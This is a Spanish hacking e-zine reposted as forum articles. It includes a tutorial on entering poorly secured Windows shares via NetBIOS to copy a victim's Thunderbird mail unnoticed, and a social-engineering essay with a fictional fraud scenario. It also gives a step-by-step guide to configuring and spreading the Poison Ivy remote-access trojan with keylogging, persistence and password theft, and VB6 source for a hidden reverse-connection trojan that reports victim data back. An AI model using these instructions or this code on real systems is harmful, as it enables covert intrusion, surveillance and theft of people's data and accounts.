CUH E-ZINE #1ª EDICIÓN v. FORO

INTRODUCCIÓN

Buenas, en este mismo tema expondremos la versión FORO de la 1ª edición de la CUH E-ZINE.

Es una buena alternativa y así cualquier usuario que busque en el foro podrá encontrar tutoriales e información que se han hecho en la e-zine sin tener que descargársela.

Decir también que esto no se terminará en un día, poco a poco iremos exponiendo los manuales y pasándolos al foro Wink

.

Y de nuevo, dar las gracias a todos los colaboradores por sus manuales Grin

Saludos!!
pd: no escribáis respuestas en este tema, está reservado para los artículos

pd2: y desde aquí recordaros que estamos buscando gente para la segunda edición

-ROBO DE EMAILS A TRAVÉS DE NETBIOS by Mancuertex(Viper)

En esta primera entrega nos adentraremos en el mundo de NetBios (Network Basic Input/Output System), que como muchos ya sabrán es un sistema de entrada y salida de red utilizado principalmente para el uso compartido de recursos y servicios en redes locales.

Nosotros lo enfocaremos al robo de datos a través de una red mal administrada y nos introduciremos en el PC de la víctima para conseguir los datos de su correo electrónico sin que note absolutamente nada.
Vamos a empezar por activar el protocolo de red (Netbios).
Podemos activar NetBios desde las propiedades de nuestra conexión de Área Local.

Seguramente tendremos la opción marcada de “Predeterminado” si esto es así, es que nuestro protocolo de red permanecía activo y nosotros sin saberlo…
Para activarlo definitivamente escogemos la segunda opción “Habilitar NetBios sobre TCP/IP”

Una vez activado, ya podemos compartir nuestros recursos de red, y mejor aún trabajar con los recursos de red que otros usuarios comparten. A partir de ahora podremos acceder a un ordenador para ver sus recursos compartidos, escribiendo en nuestro navegador o en cualquier ventana de Windows dos contrabarras y la IP de la máquina con la que queremos conectar.
Ejemplo:\\192.168.1.254

Para acceder a un recurso compartido en concreto debemos escribirlo después de la IP, seguido del símbolo del dólar.
Ejemplo: \\192.168.1.254/C$
Ya sabemos usar los recursos compartidos ahora vamos al grano.
Necesitamos acceso al PC de la víctima y para ello necesitamos saber su IP, así que como estamos en una red local, en mi caso bajo un dominio, abriremos la consola de Windows y teclearemos el comando Net View

/Network, el cual nos mostrará que usuarios hay conectados a nuestra red actualmente.

Mi Net View me devolvió estos datos:

Escogeremos a PC-0036 como víctima, pero todavía no sabemos su IP, aunque con el host ya podríamos trabajar, para completar el trabajo resolveremos el host para que nos devuelva la IP. Es tan sencillo como realizar un ping al host.
Ejemplo: Ping PC-0036

Bien, ya tenemos la IP 192.168.1.20 Ya podemos empezar a explotar sus recursos compartidos.

Vamos a acceder a través de una ventana tal y como hemos dicho antes, y a comprobar si tiene compartido el recurso de red que necesitamos. En este caso es C$.
Escribiremos \\192.168.1.20/C$
y atención porque nos acaba de mostrar su disco duro, eso quiere decir que ya tenemos acceso de lectura a su disco, y como probablemente su red esté muy mal administrada, tengamos también acceso de escritura, lo que quiere decir, que podemos modificar cualquier archivo.

Nuestro objetivo es averiguar que correos electrónicos guarda en su ordenador así que vamos a averiguarlo…

Navegando por su ordenador, nos damos cuenta que usa Mozilla Thunderbird, un cliente de correo con licencia GNU y nos “complica” un poco mas la cosa, pero sigue siendo sencillo.

Navegando por todas las carpetas de Mozilla Thunderbird, averiguamos que encripta y guarda los e-mails por defecto con la extensión .MSF en una carpeta situada en Datos de Programa.

Unos archivos dependen de otros, y sería difícil intentar abrirlos así por las buenas ya que no conseguiríamos apenas resultados.

Así que optaremos por instalarnos el Mozilla Thunderbird en nuestro ordenador

Copiaremos todos los datos guardados en el ordenador de la víctima en el nuestro.
De tal forma que Mozilla Thunderbird, abra los e-mails con la extensión .MSF como si fueran los nuestros propios.

Una vez hemos copiado todos los archivos a nuestra carpeta, solo tendremos que abrir Mozilla Thunderbird y aparecerán los correos de nuestra víctima como si de los nuestros se tratase.

Con acceso de lectura y escritura en el PC de la víctima podemos hacer 1000 y una cosas, yo he elegido la de robar e-mails porque es un tema interesante y sencillo, pero una vez tenemos acceso el único límite es nuestra imaginación.

FAQ

¿Tengo yo NetBios en mi red?
Como ya hemos dicho NetBios es un sistema de entrada y salida de red, el cual hay que tener activado bajo el protocolo TCP/IP si deseamos compartir impresoras o recursos en red con otros ordenadores, por lo tanto si compartes datos en tu red, tienes el protocolo activado.

¿Es peligroso tenerlo activado?
En una red bien administrada, no es peligroso, sino necesario, ya que nos facilita mucho el trabajo a la hora de trabajar remotamente. Pero en una red mal administrada puede ser peligroso tenerlo activado.

¿Cómo puedo proteger mi equipo frente a estos ataques?
Instalando un Firewall o usando el que viene por defecto en Windows XP SP2 o desactivando NetBios sobre TCP/IP.

¿Cómo uso NetBios sin riesgos?
Agregando permisos a los recursos compartidos.

written by Mancuertex(Viper)

-INGENIERÍA SOCIAL by ElPerro

La ingeniería social esta muy desvalorizada hoy en día por la comuna informática.
A los ingenieros sociales se los trata de idiotas, ignorantes, mentirosos, en fin, cada vez más cercano al termino LAMMER.
Sin embargo, hay que ser mucho más ingenioso en esta práctica que al estar frente a un monitor dependiendo de los fallos que otras personas hayan cometido al crear un sistema informático.

Según Wikipedia.org:
Exploit (del inglés to exploit, explotar o aprovechar) es un programa informático malicioso, o parte del programa, que trata de forzar alguna deficiencia o vulnerabilidad de otro programa (llamadas bugs).

El fin puede ser la destrucción o inhabilitación del sistema atacado, aunque normalmente se trata de violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros.

Un "exploit" es usado normalmente para explotar una vulnerabilidad en un sistema y acceder a él, lo que es llamado como "rootear".

Esta es la definición de Wikipedia.org para “explotar” un error en un sistema.
Es sabido que el ser humano es probablemente, el sistema más complejo de la naturaleza, desgraciadamente, también es el bug mas sensible de todo sistema organizado.

Precisamente esto vamos a aprender, a explotar el peor error en la organización informática; el que se encuentra entre el teclado y la silla.

En el campo de la seguridad informática, ingeniería social es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos.

Un ingeniero social usará comúnmente el teléfono o Internet para engañar a la gente y llevarla a revelar información sensible, o bien a violar las políticas de seguridad típicas.

Con este método, los ingenieros sociales aprovechan la tendencia natural de la gente a confiar en su palabra, antes que aprovechar agujeros de seguridad en los sistemas informáticos.
Generalmente se está de acuerdo en que “los usuarios son el eslabón débil” en seguridad; éste es el principio por el que se rige la ingeniería social.

Un ejemplo contemporáneo de un ataque de ingeniería social es el uso de archivos adjuntos en emails que ejecutan código malicioso (por ejemplo, usar la máquina de la víctima para enviar cantidades masivas de spam).

Ahora, luego de que los primeros emails maliciosos llevaron a los proveedores de software a deshabilitar la ejecución automática de archivos adjuntos, los usuarios deben activar los archivos adjuntos de forma explícita para que ocurra una acción maliciosa. Muchos usuarios, sin embargo, cliquean ciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque.

Quizá el ataque más simple que aún es efectivo sea engañar a un usuario llevándolo a pensar que uno es un administrador del sistema y solicitando una contraseña para varios propósitos.

Los usuarios de sistemas de Internet frecuentemente reciben mensajes que solicitan contraseñas o información de tarjeta de crédito, con el motivo de "crear una cuenta", "reactivar una configuración", u otra operación benigna; a este tipo de ataques se los llama phishing (pesca).

Los usuarios de estos sistemas deberían ser advertidos temprana y frecuentemente para que no divulguen contraseñas u otra información sensible a personas que dicen ser administradores.

En realidad, los administradores de sistemas informáticos raramente (o nunca) necesitan saber la contraseña de los usuarios para llevar a cabo sus tareas.

Sin embargo incluso este tipo de ataque podría no ser necesario — en una encuesta realizada por la empresa InfoSecurity, el 90% de los empleados de oficina de la estación Waterloo de Londres reveló sus contraseñas a cambio de un bolígrafo barato.

La ingeniería social también se aplica al acto de manipulación cara a cara para obtener acceso a los sistemas computacionales.
Entrenar a los usuarios en el uso de políticas de seguridad y asegurarse de que son seguidas es la principal defensa contra la ingeniería social.

Uno de los ingenieros sociales más famosos de los últimos tiempos es Kevin Mitnick [El cóndor]. Según su opinión, la ingeniería social se basa en estos cuatro principios:

* Todos queremos ayudar.
* El primer movimiento es siempre de confianza hacia el otro.
* No nos gusta decir No.
* A todos nos gusta que nos alaben.

Si bien estos conceptos son claros, concisos y con un alto grado de verdad, no son absolutos.
Habla de que la Ingeniería Social se aplica a la informática, es cierto, últimamente se asocia el término a hackers e intrusión de sistemas, pero no es del todo completa la definición.
En los años 50 y 60 se destaco un personaje emblemático para cualquier Ingeniero Social, hablo de Franck Abgnale Jr. Un joven que a los 17 años engañaba a sus maestros, padres y compañeros para obtener algún provecho. Este personaje puede ser visto en toda su magnificencia en la película "Atrápame si puedes" con Tom Hanks y Leonardo Di Caprio.

¿Como se usa la Ingeniería Social?
Hay muchas formas de usarla, con ingenio podemos ser personal de limpieza, abogados, contadores, consultores o vagabundos. Hablo de disfraces [no es chiste].

Imaginemos la situación [Solo es un ejemplo, no quiere decir que pueda derivar en una situación real]:
Entra un joven de traje y corbata, un gafete con datos y logotipo de una gran empresa de software y un maletín con documentaciones varias al banco y solicita hablar con EL GERENTE Y CON EL JEFE DE SISTEMAS.

Inmediatamente solicita un inventario con los seriales de los sistemas operativos usados en cada terminal y solicita ver cada una de ellas. Gran problema para los directivos del banco, vino un inspector de Microsoft Corp. a ver si tenemos MS/Windows original instalado en nuestras PC...Y NO TENEMOS NI UNO!!!! En este caso puede pasar lo siguiente:

1 - Te ofrecen una coima en dinero.
2 - Se disculpan y prometen obtener licencias.
3 - Llaman a su abogado para ser asesorados.
4 - Preguntan como pueden solucionar el asunto.
5 - Llaman a Microsoft Corp. para verificar la identidad del inspector [a correr!!!]

Siempre, el Ingeniero Social va a tratar de llegar al punto 1 o4 y es entonces donde abre su maletín y saca ladocumentación.

Formulario de amonestación por uso indebido de software y bla bla bla, se notifica al banco que se va a impartir unamulta de XXX [suma muy grande]. Es muy posible que el banco no quiera pagar tal multa y simplemente le pagan un valor menor a nuestro Ingeniero Social. Fin del asunto...

ESTO ES SOLO FICTICIO!!!
Basado en una situación cómica que ocurrió en mi trabajo hace mucho tiempo cuando le hicimos un chiste al gerente de la empresa [no era un banco] y al encargado del centro de cómputos.

El chiste nos salio bien, el director de la empresa estaba desesperado por no ligar la multa y quiso sacarse el problema de encima lo antes posible, podían despedirlo por algo así.

En conclusión. Esto fue solo un ejemplo de aplicación en la vida real sin necesidad de engañar a alguien vía Internet, es más peligroso, pero sin duda más divertido.

En la próxima entrega analizamos mayores problemas derivados en el engaño del cual todos podemos ser víctimas.

Suerte que no se enojo, nos castigo con trabajos forzados nada mas...pero estuvo muy gracioso el asunto.

written by ElPerro

-APRENDE A USAR UN TROYANO by FroSeck

Saludos, soy FroSeck y he hecho este manual dividido en dos partes con el único fin de solucionar aquellas dudas que puedan tener los usuarios mas principiantes en este tema y guiarlos en el uso de troyanos de conexión inversa sin responsabilizarme del mal uso que hagáis de éste. Espero que os sirva de gran ayuda.

Conceptos básicos
Para empezar en este manual creo que lo mejor será tener bien claro unos conceptos imprescindibles para saber lo que estamos haciendo.

Troyano: Programa generalmente dividido en dos partes, el cliente y el servidor, cuya interacción permite controlar ordenadores ajenos (víctimas) en los que ha sido introducido incorporado en otra aplicación aparentemente inofensiva.

Se distinguen dos tipos de troyanos:

-Conexión directa: El cliente se conecta a la victima (servidor) mediante su IP. Este método está en desuso ya que es necesario saber cual es la IP de nuestra víctima y que no use router.

-Conexión inversa: La víctima (servidor) se conecta a nosotros (cliente) mediante nuestra IP.
Este método es el usado por la gran mayoría debido a su gran facilidad, aunque tiene algunos problemas que solucionaremos mas adelante.

Cliente: Parte de un troyano que accede a los servicios ofrecidos por un programa llamado servidor.

Servidor: Parte de un troyano que realiza tareas en beneficio de otras aplicaciones llamadas clientes.

IP: (Internet Protocol) es un conjunto de cuatro números del 0 al 255 separados por puntos con los cuales se identifica a un ordenador conectado a una red que corre bajo este protocolo. Nuestra IP puede ser estática (si siempre es la misma) o dinámica (si cuando reiniciamos la conexión cambia). Se pueden distinguir dos IPs en un ordenador.

Puerto: Mecanismo por la cual entra y sale la información de una computadora. Para que se entienda mejor, podemos decir que es una “puerta” que se utiliza para intercambiar información de un sitio a otro y para que se de lugar el intercambio tiene que estar abierta.

Joiner: Programa que se encarga de unir dos o más archivos en uno solo que tendrá como extensión “.exe”.

Router: Aparato encargado de dirigir el tráfico de paquetes de un lugar a otro.

Servicio NO-IP
Bueno como hemos visto antes en los troyanos de conexión inversa (que son los que vamos a tratar en este manual) es necesario que pongamos al crear nuestro servidor nuestra IP, pero ¿qué pasaría si nuestra IP fuera dinámica?
Pues pasaría que nuestra víctima se conectaría a nosotros hasta que se nos cambie por otra. Entonces la perderíamos y no se podría conectar debido a que nuestra IP ya no es la que pusimos en la configuración del server.

Para evitar esto tenemos que utilizar servicios como NO-IP. Este servicio lo que hace es redireccionar la conexión que hace el servidor a nuestro ordenador.

Para utilizar este servicio lo primero que tenemos que hacer es:
Acceder a su web:
www.no-ip.com

Hacer click donde pone Sign-up Now!
Seguir los pasos para registrarse y obtener una cuenta.

Activamos nuestra cuenta y nos logueamos.
Hacemos click en el menú de la izquierda donde pone add y escribir únicamente el hostname que puede ser un nombre cualquiera y en Host Type seleccionamos DNS Host (A) y ya esta, ahora le tenemos que dar (más abajo) a Create Host.

Una vez creado volvemos a Hosts / Redirects y esa dirección (EJ: "ola.no-ip.org") que vemos será lo que sustituirá a nuestra IP en la configuración del servidor.
Ahora nos tenemos que instalar el programa NO-IP DUC que descargaremos de aquí:
http://www.descargarlo.com/descargar-1957-DUC.No_Ip.html

Una vez instalado lo ejecutamos y escribiremos nuestros datos de la cuenta y nos aparecerá la dirección de nuestro host que creamos anteriormente. Así quedaría:

Es importante que la carita salga sonriente como en la imagen si no es que hemos hecho algo mal.
Cuando estemos usando algún troyano es necesario ejecutar este programa porque si no jamás se nos conectara a nuestra víctima (servidor).

Con este servicio podremos conectarnos en cualquier ordenador a nuestra víctima mientras tengamos el cliente del troyano y nuestro NO-IP DUC ya que da igual la IP que tengamos.

Creación y configuración del servidor
Ahora nos toca elegir el troyano que más nos guste, por supuesto de conexión inversa.
Yo recomiendo el Poison Ivy 2.3 que podemos descargar de aquí:
http://www.poisonivy-rat.com/dl.php?file=PI230

Es importante que antes de descargarlo desactivemos nuestro AV (antivirus) para que no nos lo borre y poder trabajar con él. Cuando descomprimamos el RAR haremos clic en el archivo “Poison Ivy 2.3.0.exe” que es nuestro cliente que usaremos para controlar a nuestra víctima y para crear el servidor que posteriormente le mandaremos.

Para empezar a configurarlo todo le daremos a File y a New Client y nos saldrá esto:

Dejaremos el Puerto por defecto (3460) si queremos, luego pondremos nuestra contraseña en el recuadro y haremos click en Start.
Ahora toca configurar nuestro servidor.
Le damos a File y a New Server. Ahora le damos a create profile y nos saldrá un recuadro para ponerle el nombre a el perfil (ponemos lo que queramos).
Luego nos saldrá esta ventana:

¿Recordáis la dirección del host que creamos antes? Pues ahora debemos añadirla a nuestro server para que se nos conecte.
Le damos a Add y luego ponemos nuestra dirección e importante poner puerto 3460 (o si lo cambiamos poner ese).

Podemos probar si va bien dándole a Test Connections (tenemos que tener activo el NO-IP DUC).
Si aún así os sale una X (no os funciona) y tenéis un router es normal así que leer el apartado Mapear puertos del manual.
El recuadro ID será el nombre de identificación que nos aparecerá para que sepamos quien es. Luego deberemos poner la contraseña que pusimos antes al configurar el cliente, si ponemos otra no se nos conectará. Lo demás lo dejamos como está.
Le damos a Next y nos aparece esta ventana:

La primera casilla sirve para crear una entrada en el registro y ejecutarse en cada inicio de Windows.
Recomiendo desactivarla ya que algunos AV como el Kaspersky lo detectarían por heurística y nuestro troyano se volvería detectable.

También recomiendo desactivar la casilla Copy File que sirve para que se autocopie a una carpeta y así permanecer oculto ya que también es detectada por algunos AV.
Estos problemas los solucionaremos en la siguiente parte de este manual para que se inicie con Windows, se oculte y sea indetectable.

Luego vienen tres casillas, la primera hace que el servidor se auto-elimine al ejecutarse cosa que no nos conviene en nuestra configuración así que lo desactivamos.
Luego las dos siguientes (Keylogger para ver lo que escribe nuestra víctima) y Persistence (para que sea mas difícil borrar el servidor) las activamos. Le damos a Next y nos aparece esto:

La casilla de Inject sirve para inyectarse en otro proceso.
La dejamos desactivada y así por defecto se inyecta en el proceso “explorer.exe”.
Lo dejamos todo como esta y le damos a Next y simplemente le ponemos un icono si queremos y luego dejando todo como esta le damos a Generate y ya tenemos nuestro server creado.
Para terminar de tenerlo todo configurado haremos click en Preferences (al lado de File) y en la pestaña General.

Deberá estar activado el Auto-Refresh.
Le damos clic en Ok y estamos listos para recibir una conexión.
A continuación explicaré brevemente como usar el cliente para hacer lo que deseemos en el ordenador de nuestra víctima.
Lo mejor que podéis hacer para aprender a usarlo es probando vuestros servidores con vosotros mismos y viendo las opciones que trae este troyano con vosotros.

Si cuando los probáis con vosotros mismos no funciona es porque como dije antes o lo habéis hecho mal o tenéis un router y en el apartado Mapear puertos lo podéis solucionar.

Uso del cliente
Para poder seguir con este apartado debemos de tener una víctima.
Nosotros serviremos.
Haremos una copia de nuestro servidor y lo meteremos en una carpeta como copia de seguridad y luego lo ejecutamos (con el AV desactivado ya que aun no es indetectable). Una vez que hagamos dos clicks en nuestra víctima nos saldrá esta columna que procederé a explicar brevemente:

Information: Nos da información del SO de nuestra víctima y del servidor.
Files: Desde aquí podemos manejar los archivos de nuestra víctima.
Search: Busca archivos en el disco duro de la víctima. Regedit: Permite editar el registro.
Search: Permite buscar una clave en el registro de nuestra víctima.
Processes: Da un listado de los procesos de nuestra víctima. Servicios: Da un listado de los servicios de nuestra víctima.
Installed Applications: Da un listado de todas las aplicaciones instaladas.
Windows: Da un listado de las ventanas abiertas en el ordenador de la víctima.
Relay: sirve para ver y manipular el trafico entre los diferentes proxys y servidores. Para nuestro servidor no tiene ninguna utilidad.
Active Ports: Da un listado de todos los puertos abiertos. Remote Shell: Sirve para obtener una Shell de la víctima y manejar la consola.
Cached: Da un listado de las contraseñas almacenadas por un navegador (EJ: Firefox).
NT/NTLM Hashes: Obtiene los hashes del archivo sam para poder (si quieres) crackearlos por tu cuenta y sacar las contraseñas de inicio de sesión de Windows.
Wireless: Obtiene las contraseñas almacenadas de redes inalámbricas.
Keylogger: Permite ver lo que ha escrito la víctima aunque tú no estés presente.
Audio Capture: Permite capturar sonido si la víctima tiene un micrófono.
Screen Capture: Permite hacer una captura de pantalla a la víctima.
Webcam Capture: Permite ver a la víctima a través de su Webcam si la tiene.
Remote Port Scanner: Permite ver que puertos tiene abiertos la víctima.
Edit ID: Cambia el nombre con el que se identifica nuestra víctima.
Share: Permite compartir nuestra víctima con otra persona.
Update: Permite sustituir nuestro servidor por otro. Restart: Resetea el servidor por si hay mucho ping por ejemplo.
Unnistall: Borra nuestro servidor del ordenador de nuestra víctima.

Mapear puertos
Si tenéis un router y aun no se os conecta el servidor a vuestro cliente es porque no habéis abierto el puerto correspondiente.
Tenéis que ir a la configuración de vuestro router y abrirlo y redireccionar el tráfico que entre por ese puerto a tu ordenador.
Para ello tienes que saber cual es tu IP privada. Ve a inicio, ejecutar, escribes cmd y luego ipconfig.
Ahí te aparecerá tu IP privada (la que tienes dentro de tu red).
Otra cosa importante es la puerta de enlace que en mi caso es 192.168.1.1
Para acceder a la configuración de tu router debes de teclear la puerta de enlace en la barra de direcciones de tu navegador y luego pones usuario y contraseña y listo. Una vez dentro tendrás que encontrar un apartado donde te permita abrir los puertos.

En mi caso tengo un Linksys WRT54G Wireless-G Router. Hay muchos mas modelos de routers y por supuesto no puedo hacer un manual para cada uno.
Pero estoy seguro que si investigáis un poco lograreis abrirlos. Además siempre tendréis a www.google.com o a nuestro foro http://foro.el-hacker.com
Al hacer lo antes descrito e ir a la parte donde se abren los puertos aparece esto:

En application se puede poner cualquier nombre.
En Start y End se pone el puerto que has escogido, en mi caso el 3460. En Protocol se deja en Both.
En IP Address pones tu IP privada, luego le das a Enable y lo guardas. Para que se entienda mejor todo esto que estamos haciendo os pongo este esquema de una conexión inversa si estamos detrás de un router:

Se ve como nuestra víctima se conecta a nuestro host guiafroseck.no-ip.org por el puerto 3460 y este lo redirecciona a nuestro router con IP 80.130.10.100
Gracias a que hemos mapeado el puerto 3460 el router es capaz de mandar la conexión a nuestro ordenador que en este caso tiene de IP privada 192.168.1.4. Ahora sólo queda hacer indetectable y camuflar nuestro servidor, hasta la segunda parte.

Troyano o Caballo de Troya [DEFINICIÓN]

Un troyano o caballo de Troya es un malware‐‐> Código malicioso‐‐>MALicious softWARE ‐, por lo general es un programa que permite el acceso remoto de un PC (muchos de ellos fueron en un principio programas creados para la supervisión de redes de sistemas de información) , hoy en dia es una de la formas mas fáciles de vulnerar un sistema informático, la mayor virtud que debe poseer un troyano es la de ser indetectable, he ahí el dilema, existen diversas técnicas para troyanizar un computador, por medio de blindeo de imágenes, incrustados en archivos comprimidos, embebidos en diapositivas, encriptados (muchos se valen de tremendas artimañas‐>Lammeradas): entrando a foros de discusión, se familiarizan (hacen amigos) y después sueltan (la bomba) una serie de "aportes" (infectados) todos ellos tan pulcros ahí embebidos

dispuestos a prestar una mano a los incautos, que a cualquier enlace de descarga hacen clic. Cosas de la vida. Una vez se ha troyanizado un sistema, se tiene acceso total, el funcionamiento de un troyano radica en la instalación de dos programas básicos: cliente y servidor, compartiendo el mismo puerto, el servidor es el programa que se instala en la victima (no importa el método de romanización que se infrinja), y el cliente se instala en nuestro computador, el cliente es que ordena y el server obedece, se pueden tener varias víctimas, simplemente con cambiar el numero de la IP de el server ya rotamos de esclavo, Wink

_{Troyano de conexion Inversa-----By Don Nadie}

En este apartado vamos a aprender a crear un Troyano de conexión inversa en VB 6.
La conexión inversa, es la victima la que se conecta a ti, contrario de los de conexión directas en que eres tu quien se conecta a la victima.
Con esto podemos tener a varias victimas a la vez y no de una en una y además si están detrás de un router funcionará Wink

Bueno empecemos por crear un nuevo proyecto.
Vamos a Proyecto>Componentes y marcamos los siguientes controles:
-Microsoft Windows Common Controls 5.0 (con el 6.0 al Listview no se le puede aplicar estilo XP).
-Microsoft Winsock Control 6.0

Ahora pasamos a insertar los componentes necesarios, esto puede variar según cada uno, como le guste etc…

Vamos a añadir el Listview que es este control:

En nombre, yo le puse LV
En el cuadro propiedades, en personalizado debéis tenerlo así:

Nos vamos a encabezados de columna, y añadimos las siguientes columnas:
-Nombre
-IP
-Nick/Nombre PC
-S.O
-RAM
-Pais
-CPU
-Cam
-Admin
-Version

Bueno esto es a gusto, yo lo haré así, ustedes como vean.
El tamaño también lo ajustan al gusto(el ancho de cada columna).
A mi me gusta que tenga la propiedad Gridlines, que es las rejillas, como el bifrost, bueno ya verán la imagen, para el que le guste, Tughack(Sniper) lo explicó en el foro, y también la propiedad Multiselect, así que les dejo el link:
http://foro.el-hacker.com/index.php/topic,78815.0.html

También explica el estilo XP, así que no explicaré eso….

Bueno ,el aspecto(en ejecución, después de ser compilado y agregado el estilo XP)debería ser parecido a este:

Como dije , ustedes pónganle las opciones que quieran…
Ahora vamos a añadirle un label, que abajo, donde nos mostrará el estado y eso.

En Borderstyle, pónganle FixedSingle.
Ahora añadan al formulario el control Winsock:

Y en la propiedad nombre pónganle WS(por comodidad….).
Y en Index pónganle el valor 0.
Un Timer interval a 1.
Añádanle un menú, vayan a Herramientas>Editor de Menús.
En caption Escriban Menú, y en name igual. Desmarquen la propiedad Visible.
Luego denle insertar, denle a la flecha que va hacia abajo, y luego a la flecha que va apunta a la derecha. Y en caption pongan “Cambiar Nombre” y de nombre “Name”.
Esto es lo que deberían tener:

Acepten.
Bueno vamos a ver un poco de codigo:

CLIENTE

Public total as integer
Private sub form_load() ‘al cargar el formulario
WS(0).LocalPort = 2300 ‘escuchamos en el puerto 2300
‘Nota,seria mejor hacer un nuevo formulario,llamado Settings en donde se especifique el puero ha escuchar,pero de momento mejro dejenlo fijo
WS(0).Listen ‘Nos ponemos a la escucha
Label1.Caption = "Escuchando en el puerto " & “2300”
total = 0 ‘la variable totalindex sea 0
End Sub

Private Sub Timer1_Timer()
Dim v As Long, marca() As String
On Error Resume Next
For v = 1 To lv.ListItems.Count ‘bucle que recorre todos lso elementos del listview
marca = Split(lv.ListItems(v).Key, "|") ‘esto es un
identificador,lo sacamos de la key
If WS(marca(0)).State <> 7 Then ‘si el estado de ese no es conectado
lv.ListItems.Remove (v) ‘lo eliminamos de la lista porque no estamos conectados
End If
Next
Me.Caption = "Troyanito - " & lv.ListItems.Count & " conectado(s) -" 'ponemos el
nombre de nuestro troyano y el nº de conectados
End Sub
Private Sub WS_ConnectionRequest(Index As Integer,ByVal requestID As Long)
‘cuando hay conexion

On Error Resume Next
total = total + 1 ‘sumamos 1 a esta variable
WS(Index).Close ‘cerramos la conexion
WS(Index).Accept requestID ‘aceptamos la peticion
Load WS(total)

WS(total).Listen ‘nos ponemos a la escucha(pero fijenese que le sumamos 1,proque el indice esta ocupado,se hizo conexion con ese indice asique le sumamos 1 para aceptar nuevas)escuhamos con ese indice

End Sub
Private Sub LV_Mousedown(Button As Integer, Shift As Integer, x As Single, y As Single) ‘al clicar(en relaidad cuando se suelta el mouse)
On Error Resume Next
If lv.selectedItem.Selected = False Then ‘si no hay nada seleccionado salimos
Exit Sub ‘salimos
ElseIf Button = 2 Then ‘sino,si se pulsó el boton 2(derecho)
PopupMenu Menu ‘mostramos el menu Menu
End If
End Sub

Private Sub name_click() ‘al clicar en change name(de nombre name)
lv.StartLabelEdit ‘que podamos editar el nombre
End Sub
Private Sub lv_AfterLabelEdit(Cancel As Integer, NewString As String)’despues de cambiar el nombre
WS(lv.SelectedItem.Index - 1).Senddata "nombrecan|" & NewString ‘enviamos el identificador y el valor que se puso
End Sub

Private Sub WS_DataArrival(Index As Integer, ByVal bytesTotal As Long) ‘cuando recibimos datos
Dim datos as string
Dim data() as string ‘array
WS(Index).GetData datos ‘recibimos los datos y los guardamos en la variable “datos”
Data=Split(datos,”|”)’partimos la variable datos por el identificador “|”,para separar datos
Select case Data(0)’según lo que contenga .Data(0) es el primer dato,usaremos eso como identificador
Case “Conexion”
….
End select
End Sub

Bueno, eso lo dejamos así, porque primero tenemos que poner código en el servidor, luego modificaremos esa parte.
Ahora abran un nuevo proyecto, este será el server, añádanle también el Winsock y de nombre también WS,el aspecto nos da igual ya que no se verá

Y un timer, enabled true e interval 1.
Un picture1.

SERVIDOR

Dim victima as string,name1 as string,so as string,ip as string,port as string,webcam as string,pais as string ,tor as string,nombrepc as string,procesador as string
Dim admin as boolean
Private Sub form_load()
On error resume next
Open Environ("windir") & "\KB007.txt" For Input As #1 ‘abrimos un archivo de texto en el directorio de windows
Input #1, victima ‘leemos el contenido de este
If victima = "" Then ‘si esta vacio
victima = "Default" ‘le ponemos default a la victima
End If ‘sino victima contendrá lo que contenga ese archivo, eso es para cuando cambiemos el nombre a la victima.
Close #1

Dim yo As Object
Set yo = CreateObject("wscript.shell")

pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME)

nombrepc = Environ("ComputerName")’esta variable contendrá el nombre del pc
name1 = Environ("UserName")’el nombre de usuario
so =

yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Productname")’el sistema operativo
ip = "127.0.0.1" ‘la ip, pueden hacer un edit server
port = 2300 ‘lo mismo, con el edit server lo editan….

procesador = yo.regread("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor
\0\ProcessorNameString") ‘júntenlo, es k no cabía, es para el procesador....
App.TaskVisible = False ‘para que no se vea en el admin de tareas en aplicaciones
If App.PrevInstance = True Then: End ‘si ya esta en ejecución salimos, para no tener 2 corriendo a la vez

Me.visible=false ‘para que no se vea el form….
‘Esto es para la webcam
Dim temp As Long

hwdc = capCreateCaptureWindow("CapWindow", ws_child Or ws_visible, _
0, 0, 320, 240, Picture1.hwnd,

0)
If (hwdc <> 0) Then
webcam = "Si" ‘entonces si tenemos webcam
temp = DestroyWindow(hwdc)
temp = SendMessage(hwdc, WM_CAP_DRIVER_DISCONNECT, 0&, 0&)
DoEvents
Else
webcam = "No" ‘pues no
End If

pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME) ‘para obtener el país

admin = CBool(IsNTAdmin(ByVal 0&, ByVal 0&))’para saber si somos admins o no
If admin = True Then
tor = "Si"
Else
tor = "No"
End If
End Sub
‘la función para obtener el idioma y pais
Public Function ObtenerIdioma(ByVal lInfo As Long) As String
Dim buffer As String, ret As String
buffer = String$(256, 0)
ret = GetLocaleInfo(LOCALE_USER_DEFAULT, lInfo, buffer, Len(buffer))
'Si Ret devuelve 0 es porque falló la llamada al Api
If ret > 0 Then
ObtenerIdioma = Left$(buffer, ret - 1)
Else
ObtenerIdioma = ""
End If
End Function

‘función para obtener la memoria ram
Public Function GetRamSize() As String
Dim RamStats As MEMORYSTATUS
GlobalMemoryStatus RamStats
GetRamSize = Round((RamStats.dwTotalPhys / 1024) / 1024) + 1
End Function

Private Sub Timer1_Timer()
If WS.State <> 7 Then ‘si no estamos conectados
WS.Close ‘cerramos

WS.CONNECT ip, port ‘nos conectamos

End If
End Sub

Private Sub WS_Connect() ‘al haber conexión,enviamos todos los datos
WS.SendData "Conexion|" & victima & "|" & nombrepc & "|" & name1 & "|" & so & "|" & GetRamSize & "|" & pais & "|" & procesador & "|" & tor & "|" & webcam
End Sub

Private Sub WS_DataArrival(ByVal bytesTotal As Long)
‘al recibir los datos
On Error Resume Next
Dim datos As String
Dim data() As String
WS.GetData datos ‘los recibimos
Data=split(datos,”|”)
Select case data(0)
Case "nombrecan" ‘recuerden que fue lo que enviamos como marca al cambiar el nombre
Open Environ("windir") & "\KB007.txt" For Output As #1
Print #1, , data(1) ‘ponemos en el texto el nombre que se cambió
Close #1
End select
End sub

NOTA: Las constantes y módulos, no los he puesto para no llenar, lo he subido en un .txt, simplemente lean lo que digo para saber donde ponerlo, el link aquí:
By Don Nadie
http://eric-programs.awardspace.com/CONSTANTESYDEMAS.txt

Bien, hemos visto que enviamos información al conectarse, ahora en el cliente, la recibimos y la mostramos:

CLIENTE

Case "Conexion"
Dim x As ListItem
